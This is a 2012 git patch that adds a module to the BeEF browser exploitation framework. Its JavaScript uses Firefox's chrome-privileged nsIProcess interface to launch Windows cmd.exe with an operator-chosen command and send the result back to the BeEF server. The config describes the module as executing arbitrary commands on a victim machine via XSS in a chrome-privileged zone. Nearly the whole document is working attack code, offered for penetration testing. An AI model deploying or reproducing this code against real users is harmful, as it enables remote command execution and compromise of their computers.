From bfd6f764aaf1ae383ac23aa95088672f13f54bf1 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 10 Jan 2012 17:29:07 +1030
Subject: [PATCH] Added module Mozilla nsIProcess XPCOM Interface

This module is a port of the same module from BeEF-0.4.0.0

It has not been tested. It is currently disabled.

Part of issue 506
---
 .../mozilla_nsiprocess_interface/command.js   | 36 +++++++++++++++++++
 .../mozilla_nsiprocess_interface/config.yaml  | 31 ++++++++++++++++
 .../mozilla_nsiprocess_interface/module.rb    | 32 +++++++++++++++++
 3 files changed, 99 insertions(+)
 create mode 100644 modules/exploits/mozilla_nsiprocess_interface/command.js
 create mode 100644 modules/exploits/mozilla_nsiprocess_interface/config.yaml
 create mode 100644 modules/exploits/mozilla_nsiprocess_interface/module.rb

diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/mozilla_nsiprocess_interface/command.js
new file mode 100644
index 000000000..758a5dea5
--- /dev/null
+++ b/modules/exploits/mozilla_nsiprocess_interface/command.js
@@ -0,0 +1,36 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var result = "command sent";
+
+	try {
+		var command_str = "<%= command_str.gsub!(/"/, '\\"') %>";
+		var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
+		var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+		var lPath = "C:\\WINDOWS\\system32\\cmd.exe"; // maybe "%WINDIR%\\system32\\cmd.exe" would work?
+		lFile.initWithPath(lPath);
+		var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+		process.init(lFile);
+		process.run(false,['/c', command_str],2);
+	} catch (e) {
+		result = "an unexpected error occured";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
+
+});
+
diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/mozilla_nsiprocess_interface/config.yaml
new file mode 100644
index 000000000..7e1b71cd2
--- /dev/null
+++ b/modules/exploits/mozilla_nsiprocess_interface/config.yaml
@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        mozilla_nsiprocess_interface:
+            enable: false
+            category: "Exploits"
+            name: "Mozilla nsIProcess XPCOM Interface (Windows)"
+            description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe<br /><br />Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
+            authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        # It's actually 3.5 but min_ver only supports integers
+                        max_ver: 3
+                not_working: ["All"]
+
diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/mozilla_nsiprocess_interface/module.rb
new file mode 100644
index 000000000..d69389b9f
--- /dev/null
+++ b/modules/exploits/mozilla_nsiprocess_interface/module.rb
@@ -0,0 +1,32 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# This module is a port of the same module from BeEF-0.4.0.0
+# It has not been tested
+class Mozilla_nsiprocess_interface < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result']
+		save content
+	end
+
+end